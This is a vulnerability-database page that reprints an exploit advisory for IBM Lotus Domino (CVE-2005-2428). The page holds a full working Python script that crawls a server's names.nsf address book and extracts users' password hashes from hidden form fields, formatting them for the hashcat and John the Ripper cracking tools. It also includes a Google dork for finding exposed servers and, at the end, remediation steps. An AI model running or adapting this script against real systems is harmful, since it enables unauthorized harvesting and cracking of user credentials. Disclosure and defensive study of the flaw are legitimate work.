Vulners
Lucene search
IBM Lotus Domino R8 - Password Hash Extraction
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | IBM Lotus Domino R8 - Password Hash Extraction Exploit | 25 Feb 201600:00 | – | zdt |
| Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit | 13 Feb 200700:00 | – | zdt |
 | Lotus Domino Server Multiple Information Disclosure Vulnerabilities | 26 Jul 200500:00 | – | nessus |
| IBM Lotus Domino HTML Hidden Field Encrypted Password Disclosure | 27 Jul 200500:00 | – | nessus |
 | CVE-2005-2428 | 3 Aug 200504:00 | – | cve |
 | CVE-2005-2428 | 3 Aug 200504:00 | – | cvelist |
 | DSquare Exploit Pack: D2SEC_LOTUS_HASH | 3 Aug 200504:00 | – | d2 |
 | EUVD-2005-2429 | 7 Oct 202500:30 | – | euvd |
 | Lotus Domino R6 Webmail - Remote Password Hash Dumper | 13 Feb 200700:00 | – | exploitpack |
| IBM Lotus Domino R8 - Password Hash Extraction | 25 Feb 201600:00 | – | exploitpack |
10
# Exploit Title: IBM Lotus Domino <= R8 Password Hash Extraction Exploit
# Google Dork: inurl:names.nsf?opendatabase
# Date: 02-24-2016
# Exploit Author: Jonathan Broche
# Contact: https://twitter.com/g0jhonny
# Vendor Homepage: https://www-01.ibm.com/software/lotus/category/messaging/
# Tested on: Lotus Domino 8.5
# CVE : CVE-2005-2428
1. Description
IBM Domino Databases contain a configuration issue allowing users to obtain password hashes, configuraiton information and more from the Public Address Book (i.e., names.nsf database). Password hashes are obtained from the hidden HTML HTTPPassword and dspHTTPPassword fields per user in the database.
2. Proof of Concept
#!/usr/bin/env python2
import requests, re, BeautifulSoup, sys, argparse, os
requests.packages.urllib3.disable_warnings()
parser = argparse.ArgumentParser(description='Domino Effect - A Lotus Domino password hash tool by Jonathan Broche (@g0jhonny)', version="1.0")
parser.add_argument('system', help="IP address or hostname to harvest hashes from. ")
parser.add_argument('-u', '--uri', metavar='path', default="/names.nsf", help="Path to the names.nsf file. [Default: /names.nsf]")
outgroup = parser.add_argument_group(title="Output Options")
outgroup.add_argument('--hashcat', action='store_true', help="Print results for use with hashcat.")
outgroup.add_argument('--john', action='store_true', help="Print results for use with John the Ripper.")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
print "\nDomino Effect {}\n".format(parser.version)
headers={'User-Agent':'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'}
try:
response = requests.get("https://{}{}/People?OpenView".format(args.system, args.uri), verify=False, headers=headers, timeout=3)
except requests.exceptions.Timeout as e:
print "[!] Timed out, try again."
sys.exit(1)
except Exception as e:
print e
soup = BeautifulSoup.BeautifulSoup(response.text)
links = []
#grab all user profile links
for link in soup.findAll('a'):
if "OpenDocument" in link['href']:
if link['href'] not in links:
links.append(link['href'])
hashes = {}
for link in links: #get user profile
try:
response = requests.get("https://{}{}".format(args.system, link), verify=False, headers=headers, timeout=2)
except requests.exceptions.Timeout as e:
pass
except Exception as e:
print e
if response.text:
soup = BeautifulSoup.BeautifulSoup(response.text)
name = soup.find('input', {'name' : '$dspShortName'}).get('value').strip() #short name
httppassword = soup.find('input', { "name" : "HTTPPassword"}).get('value').strip()
dsphttppassword = soup.find('input', { "name" : "dspHTTPPassword"}).get('value').strip()
if httppassword and httppassword not in hashes.keys():
hashes[httppassword] = name
elif dsphttppassword and dsphttppassword not in hashes.keys():
hashes[dsphttppassword] = name
if hashes: #output
if args.hashcat or args.john:
if args.hashcat:
for h in hashes.keys():
print h
if args.john:
for h, n in hashes.items():
print "{}:{}".format(n,h)
else:
for h, n in hashes.items():
print "[*] User: {} Hash: {}".format(n, h)
print "\n{} hashes obtained\n".format(len(hashes))
3. Solution
To hide the HTTP password from the HTML source:
1) Open the $PersonalInheritableSchema subform (In the designer under Shared Code, Subforms).
2) Find the fields: $dspHTTPPassword and HTTPPassword.
3) In the field properties for both fields, on the hide tab under "Hide paragram from" check off "Web browsers".
4) Open the Person form (Under Forms).
5) In the form properties, on the 2nd tab, disable the option "Generate HTML for all fields".
In addition, ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other senstive files.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Feb 2016 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 25
EPSS0.08605